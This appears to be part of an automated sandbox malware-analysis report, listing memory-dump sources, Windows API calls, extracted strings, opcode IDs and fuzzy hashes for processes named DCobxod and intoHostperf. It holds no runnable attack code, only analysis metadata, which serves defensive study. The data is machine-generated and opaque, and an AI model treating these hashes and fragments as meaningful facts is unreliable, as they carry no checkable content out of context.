                                                              • Instruction Fuzzy Hash: FED02B3160453036D6203B286D06EAF38149B62B37B61071AF538516F6CB1C49C152DD
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,0041DA55,?), ref: 0041E2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0041DA55,?), ref: 0041E2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: adb9ffc9a253c35693416cb8b517fd2e5ccc8f998fcac2790132601a2e7a7631
                                                              • Instruction ID: 380a6a24282aff94e225e8ab13bd8826787e534fabb888c60f33d9eff21f3e09
                                                              • Opcode Fuzzy Hash: adb9ffc9a253c35693416cb8b517fd2e5ccc8f998fcac2790132601a2e7a7631
                                                              • Instruction Fuzzy Hash: E9C01235240B1066EB341F657C0DF836A585B01F53F150559B541E92D5D6A9C98086A8
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E467
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: UB$zB
                                                              • API String ID: 1269201914-197499224
                                                              • Opcode ID: de2f98e33b0333b7aa37a7f46ea70d18fe70b9555832f43ef0b04fd259cb00c2
                                                              • Instruction ID: 745022721773b77e550f90e801aa3e5f5aca381550ba75ee184af00fd4f5fa95
                                                              • Opcode Fuzzy Hash: de2f98e33b0333b7aa37a7f46ea70d18fe70b9555832f43ef0b04fd259cb00c2
                                                              • Instruction Fuzzy Hash: 9CB012D53590607C310431133D02C37420CC0C2F91371C12FF604C0086E94C0E02147F
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E467
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: pB$zB
                                                              • API String ID: 1269201914-4228823757
                                                              • Opcode ID: 2473db9d21a89573b0c46edd2a1baeccf1743c739e65d030a60589eb2252d2d0
                                                              • Instruction ID: b5a339c0e49669b5a6d5ab82ef231b597e6ba394c2778a7afc34d4c098b8234a
                                                              • Opcode Fuzzy Hash: 2473db9d21a89573b0c46edd2a1baeccf1743c739e65d030a60589eb2252d2d0
                                                              • Instruction Fuzzy Hash: 80B012C535A090BC3144B1173C02D37020CC0C1BD1371C12FF848C1081E94C4C01143F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Z_H
                                                              • API String ID: 0-3267294416
                                                              • Opcode ID: 299ab54470b8e36b608eb7aee86c744026b7f2b1e236cd720c78ea1c4b99a045
                                                              • Instruction ID: b918256914ee9ab6f6ab21099683c2892041ffcadaadb6b3def1ca66054fbc2a
                                                              • Opcode Fuzzy Hash: 299ab54470b8e36b608eb7aee86c744026b7f2b1e236cd720c78ea1c4b99a045
                                                              • Instruction Fuzzy Hash: 4FA10575D1DA899FE749EB6888293B97FE1FB59354F4000BAC049D72D2CF781809C751
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI$X.WI$X.WI
                                                              • API String ID: 0-3047802772
                                                              • Opcode ID: f7756bdd47b0e95511f3015702b95b9e94cf726231d5e0ec6eaa8be558652bd0
                                                              • Instruction ID: 16f927e3ba1f365a0daa42fb9e4d13324adc6166964d4ea6be5ee4f04777d000
                                                              • Opcode Fuzzy Hash: f7756bdd47b0e95511f3015702b95b9e94cf726231d5e0ec6eaa8be558652bd0
                                                              • Instruction Fuzzy Hash: 8C414A31A0C9598FDF98EF29D495EB4B3E1FB68320B1401ADD40AD3692DF35E885CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI$X.WI$X.WI
                                                              • API String ID: 0-3047802772
                                                              • Opcode ID: 45d40f9b4e19500000185476a679c69e916470478e9f0c8e72ada34a199f387e
                                                              • Instruction ID: d9285a330410814b9f756e6ac3504a218a5f74f5182e31f1de7b84a7ac84f4dd
                                                              • Opcode Fuzzy Hash: 45d40f9b4e19500000185476a679c69e916470478e9f0c8e72ada34a199f387e
                                                              • Instruction Fuzzy Hash: 07314A31A089958FDF98EF29C495EB477E1FB68310B1406ADD40AC7696CF35E885CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI$X.WI$X.WI
                                                              • API String ID: 0-3047802772
                                                              • Opcode ID: 6a94bf1ab4da34ae19b54232430dc1a8836aa1d15d6a03f1320e8df2e913ec5b
                                                              • Instruction ID: 5cc94d3413c7698e0b81699902efaebd157cdb76e0db40730ad227e1cb5d742a
                                                              • Opcode Fuzzy Hash: 6a94bf1ab4da34ae19b54232430dc1a8836aa1d15d6a03f1320e8df2e913ec5b
                                                              • Instruction Fuzzy Hash: 0F316D31A0C9998FDF98EF29C495EB473E1FB68310B1405ADD40AD7692CF35E885CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $X.WI$xINI
                                                              • API String ID: 0-3297095233
                                                              • Opcode ID: 36b4b38153292db1d0f97f6b1cdd0d5fb828d2fca7876f753314487d3f9be5e4
                                                              • Instruction ID: 33b22e7ef32ae19ccb6066c032e160c1bf0a7fbe6fa5e012a3439fcc3e3b1c86
                                                              • Opcode Fuzzy Hash: 36b4b38153292db1d0f97f6b1cdd0d5fb828d2fca7876f753314487d3f9be5e4
                                                              • Instruction Fuzzy Hash: D971AE30D0C68E9FEF68EFA8C8556BDBBB1FF55350F1040AAD409E7282DA386941CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $`MI$`MI
                                                              • API String ID: 0-740844305
                                                              • Opcode ID: 050e2c6ae2f7f7ff6442cc17c279e812cece6638d83057ffb19fd6ade0ac78fc
                                                              • Instruction ID: 56a6346c8390a79b3728a3e45c72db96e87d048fa510c00f9fa6959384fb0187
                                                              • Opcode Fuzzy Hash: 050e2c6ae2f7f7ff6442cc17c279e812cece6638d83057ffb19fd6ade0ac78fc
                                                              • Instruction Fuzzy Hash: B1514C70D0C68E9FDB69EFA8C4656BDB7B1FF58340F1041BEC01AA7686CA386941CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI$X.WI
                                                              • API String ID: 0-4287364349
                                                              • Opcode ID: 99469a4ce027c50ec466249e3d220c26a8954715232229696d92372decfdc3d8
                                                              • Instruction ID: 0556526fec30ee1ace15b073580b79cf97a22e4e1f323f802d922a3603c32065
                                                              • Opcode Fuzzy Hash: 99469a4ce027c50ec466249e3d220c26a8954715232229696d92372decfdc3d8
                                                              • Instruction Fuzzy Hash: 0421E122D1D3D38EFE787A6DA4257F86740AF117A1F2802BBD44E860C2DD0C28C1D796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (:YI${^H
                                                              • API String ID: 0-3826374928
                                                              • Opcode ID: 215ec64d1fffa6b7fb6d481592475231100962234f9720ea2832f2c88a910cf5
                                                              • Instruction ID: 97e7c2cd7e07eb2dd203986f966f9d9f193eb8dd3dc7b14efc708a7a0f141e99
                                                              • Opcode Fuzzy Hash: 215ec64d1fffa6b7fb6d481592475231100962234f9720ea2832f2c88a910cf5
                                                              • Instruction Fuzzy Hash: 6E41B43091C99BCEE778AE24C464AB977E1FF54342F2441BAC04EC758ACE386985D740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 99d6149de1dd7c65bb2cc46db0adc21afea5532186db41ee519f40fb725e32eb
                                                              • Instruction ID: 01dd789315f1c2ed4f3e39b573b4214794df29e4b7c51added73646eddfc5563
                                                              • Opcode Fuzzy Hash: 99d6149de1dd7c65bb2cc46db0adc21afea5532186db41ee519f40fb725e32eb
                                                              • Instruction Fuzzy Hash: 8DE1F030A1CA968FD758EF18D481675B3E1FF95360F1446B9D44ACB29BDA38F842CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: _
                                                              • API String ID: 0-701932520
                                                              • Opcode ID: aca0476269e48fc6b307d34ba6ceee8c689c66dafa6a67998d5f861215d81b13
                                                              • Instruction ID: b93e576ab88e36c9fe3ec4b944a5d602d1af990f1e60df2554de7b8be8e637e1
                                                              • Opcode Fuzzy Hash: aca0476269e48fc6b307d34ba6ceee8c689c66dafa6a67998d5f861215d81b13
                                                              • Instruction Fuzzy Hash: 96E1D13094DB86CFE378EF28D490975B7E1FF44364B15457EC08AC7682DA2DB8428B81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `MI
                                                              • API String ID: 0-1483567920
                                                              • Opcode ID: ed47800f3e5e744a1847efab720b95bee514be34b2be020f3655d0dc3e91faa2
                                                              • Instruction ID: ea42b4acb7711257434ae6751132af8fea2a45ca6cd40b55ec209dc788021e10
                                                              • Opcode Fuzzy Hash: ed47800f3e5e744a1847efab720b95bee514be34b2be020f3655d0dc3e91faa2
                                                              • Instruction Fuzzy Hash: E2B19230A0DA8A9FEB59EF68C0906B4B7A1FF55340F544179C05EC7E86DB2CB891CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 087baf991db466d2e15f6f9b7d76ba1b458d2e8fcea3bbb5e451296725c76946
                                                              • Instruction ID: 1a417163699611dc6171c3b6feb2fa04eaad0704ffa6758f38f9158e5f1dbf6d
                                                              • Opcode Fuzzy Hash: 087baf991db466d2e15f6f9b7d76ba1b458d2e8fcea3bbb5e451296725c76946
                                                              • Instruction Fuzzy Hash: 29A16E309195968FEF59DF18C4D06B437A1FF55361B6446BDD84ACB68ACA3CE8C1CB80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: e7a1f86f70788997e0de74822771f0623abda5e6859073c8c400b9c45e934a08
                                                              • Instruction ID: a24147fa81532c8b8f93142559c2ea7c68db23288add3b843e412d036df87724
                                                              • Opcode Fuzzy Hash: e7a1f86f70788997e0de74822771f0623abda5e6859073c8c400b9c45e934a08
                                                              • Instruction Fuzzy Hash: E4513830D0D68E9FDB69EF98D4546BDB7B1FF58390F5140BAC01AA7286DA382906CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7H
                                                              • API String ID: 0-728547003
                                                              • Opcode ID: b55a9ebccc61ff62232447b8af9f91476bcb947a8c8b44b21053f5d3a9f1c8f8
                                                              • Instruction ID: e150a3aff6c25a36460ba6c95fc0159f785021c8a196c2934ab3b75404b8d0cc
                                                              • Opcode Fuzzy Hash: b55a9ebccc61ff62232447b8af9f91476bcb947a8c8b44b21053f5d3a9f1c8f8
                                                              • Instruction Fuzzy Hash: AB414912A0F6A55FE304B778A0AA3F97B81DF453A5F0804BFC08DC71D7DE1868418399
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 0718afe16e4d074c8f91f3e8ebf790ab1e07e9ef830f9b5177232ccd4af9900d
                                                              • Instruction ID: 9f0fc52c86d51d0a3568272202ce10b7e76ddcbb6ea33f210c9b094f1574c29d
                                                              • Opcode Fuzzy Hash: 0718afe16e4d074c8f91f3e8ebf790ab1e07e9ef830f9b5177232ccd4af9900d
                                                              • Instruction Fuzzy Hash: 89519E30D1C9AA8EEFB8EA1884547B5B7A2FB54350F1441BAD04ED7686CE3C69C5CB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 02ac81375cb6fda2fe74b8329b36a6da960ff4e42e84484a44bc7dd1ea899078
                                                              • Instruction ID: 039ff06da7325733599f3c9ca1dea06fd4b27b9d1f94fb87fbc07ed185e33df2
                                                              • Opcode Fuzzy Hash: 02ac81375cb6fda2fe74b8329b36a6da960ff4e42e84484a44bc7dd1ea899078
                                                              • Instruction Fuzzy Hash: 29515D30E0D58A9FDB59EFA8D4A49BDB7B1FF58354F1140BAC00AE7682CB386905CB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7H
                                                              • API String ID: 0-728547003
                                                              • Opcode ID: 192ba2633d63b198bb654a4b8613f3f72b99069418fd90e2b9503ee2ec3b1cd0
                                                              • Instruction ID: f5733fa7a122f28063ee1746df208e42ab2a52623d254a85d6a2c6260001a118
                                                              • Opcode Fuzzy Hash: 192ba2633d63b198bb654a4b8613f3f72b99069418fd90e2b9503ee2ec3b1cd0
                                                              • Instruction Fuzzy Hash: 76313422A0FA696FE344B67C645A6F977C1DF493A5F0804BED44EC31D7CE186C4142A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7H
                                                              • API String ID: 0-728547003
                                                              • Opcode ID: bdec90f63e828fa85ff8de5a52571aee42910e3b851016c350848a59f21c9f61
                                                              • Instruction ID: f12758af1ab2cb1e3ed052b5e91bd4bdd5b34f5726b9d419b380a3cb7453567a
                                                              • Opcode Fuzzy Hash: bdec90f63e828fa85ff8de5a52571aee42910e3b851016c350848a59f21c9f61
                                                              • Instruction Fuzzy Hash: 55314421B0E9595FE388B63C845AAB97BC1DF99365F1400BDD44EC32D3DE189C458289
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 669a2a11521af745ce2146f8169f96682c01ec30f1d874d1a2339f1cfd24a34b
                                                              • Instruction ID: 4388ea6fe2260cb8077944496ec45886bb96811adc51876173e063d28ce37ae1
                                                              • Opcode Fuzzy Hash: 669a2a11521af745ce2146f8169f96682c01ec30f1d874d1a2339f1cfd24a34b
                                                              • Instruction Fuzzy Hash: 3331F33091C98A8EEFA8EF98C4956BD77A1FF54384F6401BAD00E965C1DB3DA980D781
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 1d1e813ba1d43dafc3d226e115542458315e2101ea2c30f72e7e9ce7dd82b3d2
                                                              • Instruction ID: 966b639354025a2ceb3d31215ee306e3fec76af07ae9fc94eb766214108c8909
                                                              • Opcode Fuzzy Hash: 1d1e813ba1d43dafc3d226e115542458315e2101ea2c30f72e7e9ce7dd82b3d2
                                                              • Instruction Fuzzy Hash: DA31B62091C5E64EEF39DA1C88645757B52EB51361B2C45FAE08ACA6D7C93CB8C5C381
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 1c01a80571884f2afbe7ad760b73ff352e59eb0bd8ab06582b0d1f89972e18b4
                                                              • Instruction ID: 5e96ffb14fbb871f16d1ed5ba03cd997a059be78536d0846dafa91e5769d5950
                                                              • Opcode Fuzzy Hash: 1c01a80571884f2afbe7ad760b73ff352e59eb0bd8ab06582b0d1f89972e18b4
                                                              • Instruction Fuzzy Hash: 1B21FA31E0895D9FDFA8EF18C455AB9B3B1FB68350F1001ADD04EE3291CA35A981CB40
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 894ac6ebab98c3c34b194097140820b600a89212186fac83856976e5daceb022
                                                              • Instruction ID: 848470a8e15e024a571c707f313cde857270f93434fba5b9a0934005779ddc3a
                                                              • Opcode Fuzzy Hash: 894ac6ebab98c3c34b194097140820b600a89212186fac83856976e5daceb022
                                                              • Instruction Fuzzy Hash: B5326330A1CA598FDFA8EF1CC855A6977E2FF55350F5041B9D04EC7292DE29AC85CB80
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: beb1ee36846f568b41753d91e017ee3be37078f9370d92de941b7f92e41da665
                                                              • Instruction ID: d1dd291c06e3dee3c6d87ab12e47aee4edf056daf8119996fdfbc8f7486fe5f4
                                                              • Opcode Fuzzy Hash: beb1ee36846f568b41753d91e017ee3be37078f9370d92de941b7f92e41da665
                                                              • Instruction Fuzzy Hash: 1C02903091C5958FEB6ADF18C490AB577A1FF45364F5542BDC84E8B28ADB3CE881CB41
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 084adc982779bf885028e1cb6dae7c135674058d186bbc48c0c919bfe1ebacf7
                                                              • Instruction ID: d894bef2a82cbdac12f5af51ff1fce42d6cd81d7f63f11fde22376c2fc38be4d
                                                              • Opcode Fuzzy Hash: 084adc982779bf885028e1cb6dae7c135674058d186bbc48c0c919bfe1ebacf7
                                                              • Instruction Fuzzy Hash: 81E1E13190DA868FE379EF28D4905B5B7E1FF54360F15097EC48AC7692DE2DB8428B81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65371b6cd40c3aad9099eb369f80b5f0c8a8a3609027013fcc474a4fd88658b3
                                                              • Instruction ID: 9504e1a46f146ae0a52fb5ffe334e21c6744cfcccb60706942b3050170d94fc6
                                                              • Opcode Fuzzy Hash: 65371b6cd40c3aad9099eb369f80b5f0c8a8a3609027013fcc474a4fd88658b3
                                                              • Instruction Fuzzy Hash: 7AE1AF3051C6968FEB59DF18C4E09B17BA1FF49355B5445BDC84ACB68BCA3CE882CB81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6d3c59c59069a8bc93afcfac4318570d995ba66e3212f7e9003aa89dc910fe0
                                                              • Instruction ID: 549245e09bce6c248407b2e1915df298bc4e977aa91eb975c9e1152ce942008c
                                                              • Opcode Fuzzy Hash: c6d3c59c59069a8bc93afcfac4318570d995ba66e3212f7e9003aa89dc910fe0
                                                              • Instruction Fuzzy Hash: 77C1F13090DB868FEB69EF28D491575BBE0FF45394B1405BEC08A87982CA2DB886C741
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64a7c21431c9076d3d29dd486a164adcf3aad9bb75463d9964312b5a3823ff10
                                                              • Instruction ID: 86ab855c4c5c009d64206ceab2bb2b91f2e47242a2e944ec50864c34c714116c
                                                              • Opcode Fuzzy Hash: 64a7c21431c9076d3d29dd486a164adcf3aad9bb75463d9964312b5a3823ff10
                                                              • Instruction Fuzzy Hash: B6C1AE3091C6968FEB29DF08C4E09B177A1FF49355B5445BDD84A8B68ACA3CE881CB81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
